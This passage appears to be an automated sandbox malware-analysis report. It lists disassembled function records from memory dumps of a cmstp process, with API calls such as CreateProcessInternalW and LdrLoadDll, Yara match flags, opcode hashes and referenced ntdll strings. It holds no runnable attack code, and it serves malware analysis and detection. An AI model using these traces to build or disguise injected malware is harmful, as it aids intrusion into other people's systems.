                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: eae49a7148fe1e165b79ccdbb62363430c888ffdd4d21c8bb6139d46b6fe1dc1
                                          • Instruction ID: 5c7e013320298cd257ce70b840aa71ee39944a5494ea674db24a0f8256618ef2
                                          • Opcode Fuzzy Hash: eae49a7148fe1e165b79ccdbb62363430c888ffdd4d21c8bb6139d46b6fe1dc1
                                          • Instruction Fuzzy Hash: 5BF0277164011875DE2166B47C43FFE37489B83B45F0440A6FA49952C3EE864506A7F2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0009AD52
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                          • Instruction ID: e759d1ebc43adca8ab2bcd6ee8611188b1765da8f0512a70fb161b4bd04106d2
                                          • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                          • Instruction Fuzzy Hash: 0A015EB5E0020DABDF10DAE0DC42FDDB3B89B15308F004195E90997642F630EB04CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000AA6F4
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction ID: 4736f0b901c09da98cead05548fa36866934e4090c25d5a030b79a285019f6d6
                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction Fuzzy Hash: 4601AFB2210108AFCB58DF89DC80EEB77ADAF8C754F158258BA0D97241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000AA6F4
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 3f602a1de7397e4b39fd9def6ee00587ac66b6f39343a89adf6c669d95ccb561
                                          • Instruction ID: b807298679bdef8f3f2b1faf78010be4e52b1c752b70c0e6fc9f444fd8fa1880
                                          • Opcode Fuzzy Hash: 3f602a1de7397e4b39fd9def6ee00587ac66b6f39343a89adf6c669d95ccb561
                                          • Instruction Fuzzy Hash: BD01AFB2210108AFCB58DF89DC80EEB77A9AF8C354F158258FA0D97241C630E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009F040,?,?,00000000), ref: 000A91AC
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
                                          • Instruction ID: 4b357aa5662d51e8b08a3a73ebfad1f1252f5175dbb216f847bc9a74b59d2f46
                                          • Opcode Fuzzy Hash: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
                                          • Instruction Fuzzy Hash: 19E06D373902043AE22065D9AC02FE7B39C9B92B20F140026FA0DEB2C2D595F80142A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009F040,?,?,00000000), ref: 000A91AC
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 8fe1a86a96aa36e029cb02f030156ca52b199ed427dbc6eb8e437db604b5800c
                                          • Instruction ID: 33b4d906a3e759faa1b71359f9623ad3d30265a0792490207d82a24e081923a0
                                          • Opcode Fuzzy Hash: 8fe1a86a96aa36e029cb02f030156ca52b199ed427dbc6eb8e437db604b5800c
                                          • Instruction Fuzzy Hash: 85F0223639170036D231A5A88C03FA736998B92B10F180069FE09BB2C2D596F80286A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F1C2,0009F1C2,?,00000000,?,?), ref: 000AA7C0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction ID: bd311862f062f3c19c5c75eb2969059cfca6b4831b906fc7121fa62b9488e6e0
                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction Fuzzy Hash: 75E01AB12002086BDB14DF89DC85EE737ADAF89650F018164BA0857242DA30E8148BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,00098D14,?), ref: 0009F6EB
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                          • Instruction ID: 9c0c29b9252940e65a6d529bfd1b0fa08b361b13211a4bcd829452c380ab0fde
                                          • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                          • Instruction Fuzzy Hash: 6DD0A7767503043BEA10FAE49C03F6633CC6B45B00F490074F948D73C3D954F4004165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • Kernel-MUI-Language-Allowed, xrefs: 01EE8827
                                          • WindowsExcludedProcs, xrefs: 01EE87C1
                                          • Kernel-MUI-Language-Disallowed, xrefs: 01EE8914
                                          • Kernel-MUI-Language-SKU, xrefs: 01EE89FC
                                          • Kernel-MUI-Number-Allowed, xrefs: 01EE87E6
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: _wcspbrk
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 402402107-258546922
                                          • Opcode ID: f9df061cff09e6457bff6635363db199dab5fd49739ef507b24befd364c60947
                                          • Instruction ID: a0f5be6b28e85195b8e95d3d624f143d5c3c81755f82805808aaedcedd336ae4
                                          • Opcode Fuzzy Hash: f9df061cff09e6457bff6635363db199dab5fd49739ef507b24befd364c60947
                                          • Instruction Fuzzy Hash: 74F1F4B2D0024AEFDF11DF98C984DEEBBF9FB08704F14546AE605A7210E7359A45DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: _wcsnlen
                                          • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                          • API String ID: 3628947076-1387797911
                                          • Opcode ID: c8f8678df08720f1f65c7b324fe25f1ecc974d95e1c074392d2c820684e997f4
                                          • Instruction ID: 4e886d1908697c34acb00539accf92608b42664ef8a8d6416b82b0c6d6af3297
                                          • Opcode Fuzzy Hash: c8f8678df08720f1f65c7b324fe25f1ecc974d95e1c074392d2c820684e997f4
                                          • Instruction Fuzzy Hash: 5E41957624120ABAE7419A92CD81FEFBB6CAF047D4F100116BF04D6161D7B3DB509BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 1bd56f2a8915a6c0f3d38d24c1f859b6df06a8e5771b2520189ff8c78651fd65
                                          • Instruction ID: 61b7411cf61414cc3c42ddff9974cb23f3aa1c35eb7363f0c02afab93d02142d
                                          • Opcode Fuzzy Hash: 1bd56f2a8915a6c0f3d38d24c1f859b6df06a8e5771b2520189ff8c78651fd65
                                          • Instruction Fuzzy Hash: AF6135B5E04656EACB36CF5DC8808BFBBB5EF95300754C12EE59647581D332E640DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: d59582f19b360dc28271a67351cc61e4cbe4d03cec5b6d7a8251e671ccc347fa
                                          • Instruction ID: 9fe3956f10f1ee3b0781d3b98773ebc11abbe51a0541033b791e7510553b655d
                                          • Opcode Fuzzy Hash: d59582f19b360dc28271a67351cc61e4cbe4d03cec5b6d7a8251e671ccc347fa
                                          • Instruction Fuzzy Hash: E761D372D00A49EBCB25DF5EC9408BE7BF9FF54210B14C52AF8AD87145E236EA41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01F13F12
                                          Strings
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01F1E345
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01F13EC4
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01F1E2FB
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01F13F75
                                          • Execute=1, xrefs: 01F13F5E
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01F13F4A
                                          • ExecuteOptions, xrefs: 01F13F04
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: BaseDataModuleQuery
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 3901378454-484625025
                                          • Opcode ID: f688e9acb393f81aac045ee9a080af5e188bfab7a16106c505028d149dcd6945
                                          • Instruction ID: 8cf29383c0016d5f6cf89aaaeb7ed0af7e7e1a9562aba9427ceedf9b849bbbe6
                                          • Opcode Fuzzy Hash: f688e9acb393f81aac045ee9a080af5e188bfab7a16106c505028d149dcd6945
                                          • Instruction Fuzzy Hash: CB41D972A4030D7ADB219B94DCC5FDF73BCAF58700F0404ADBB05E6085E7719A868BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: __fassign
                                          • String ID: .$:$:
                                          • API String ID: 3965848254-2308638275
                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction ID: 4c98f179a8272ff31137eafa3be1d57833a8c16a37f499a982a1463abc4aae5d
                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction Fuzzy Hash: 32A18071D0070ADADF26CF58C8457BEBBB5AF05384F24846AF942A72C1DE325681EB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F22206
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-4236105082
                                          • Opcode ID: 776ca66a4ffd9ca4ee43b6e64642fd2901141f32e3affef4b93b9b966d21a4ba
                                          • Instruction ID: 1e1038bc1d5cadf5e91f5572137b1553332d9f9746f829c436d81a66c14d043e
                                          • Opcode Fuzzy Hash: 776ca66a4ffd9ca4ee43b6e64642fd2901141f32e3affef4b93b9b966d21a4ba
                                          • Instruction Fuzzy Hash: B8512B35B00222ABEB15CA1DDC81FA673A9AFD5720F21421DFD55DB2C9DA33EC428790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 01F2EA22
                                            • Part of subcall function 01F013CB: ___swprintf_l.LIBCMT ref: 01F0146B
                                            • Part of subcall function 01F013CB: ___swprintf_l.LIBCMT ref: 01F01490
                                          • ___swprintf_l.LIBCMT ref: 01F0156D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: d4ce5fec15419ee9109ddea44788489f6df361f841beb52175bcbe6ca0a70ea6
                                          • Instruction ID: b8fec63dcaf66e06fb6b1f3d5f0b701fc8d4b2e3cd77cc0235f6c93a22616211
                                          • Opcode Fuzzy Hash: d4ce5fec15419ee9109ddea44788489f6df361f841beb52175bcbe6ca0a70ea6
                                          • Instruction Fuzzy Hash: AA21F772D0021ADBDB22DF58CC00AFF77ACAB90704F484019ED46E7181DB72DA598BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 0e180bf99ae1f1ea62f349228976c716f30f7fd3adae7ef5494b2ceb2292b728
                                          • Instruction ID: 2a178118609cbcde2d28f658fa35f2e69218c1b5c31b2af6754994bd7e90bfc5
                                          • Opcode Fuzzy Hash: 0e180bf99ae1f1ea62f349228976c716f30f7fd3adae7ef5494b2ceb2292b728
                                          • Instruction Fuzzy Hash: 5221C8B2D0022AABDB10AF69CD449EF7BACEF24B54F040525FD0993141E7769A49C7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F222F4
                                          Strings
                                          • RTL: Resource at %p, xrefs: 01F2230B
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01F222FC
                                          • RTL: Re-Waiting, xrefs: 01F22328
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-871070163
                                          • Opcode ID: 9030b1ca91d7373caab703923876553ddef5f38aff011300c8700d2809773c6b
                                          • Instruction ID: 2676c316be32f98c6a33fa45c197857e5991e8ff538bb23489f86f5229c9cf54
                                          • Opcode Fuzzy Hash: 9030b1ca91d7373caab703923876553ddef5f38aff011300c8700d2809773c6b
                                          • Instruction Fuzzy Hash: A4513A75600712ABEB15DF28CC80FAB73E8EF55324F104219FD05DB285EA72EC428790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01F2248D
                                          • RTL: Re-Waiting, xrefs: 01F224FA
                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01F224BD
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                          • API String ID: 0-3177188983
                                          • Opcode ID: 9ccea7f5bb449148fd527f32cfe7821e1ee5d9b4c3fe9322d0f83ca74a6c0d5a
                                          • Instruction ID: be166d89fa138dcffe0919f3c4a71c7ff1e1083183e4923bd268fc9e0e40773d
                                          • Opcode Fuzzy Hash: 9ccea7f5bb449148fd527f32cfe7821e1ee5d9b4c3fe9322d0f83ca74a6c0d5a
                                          • Instruction Fuzzy Hash: 70411870A00215EBDB24DF68CD88FAE7BF8EF88720F108609F6559B2C1D736E9418761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
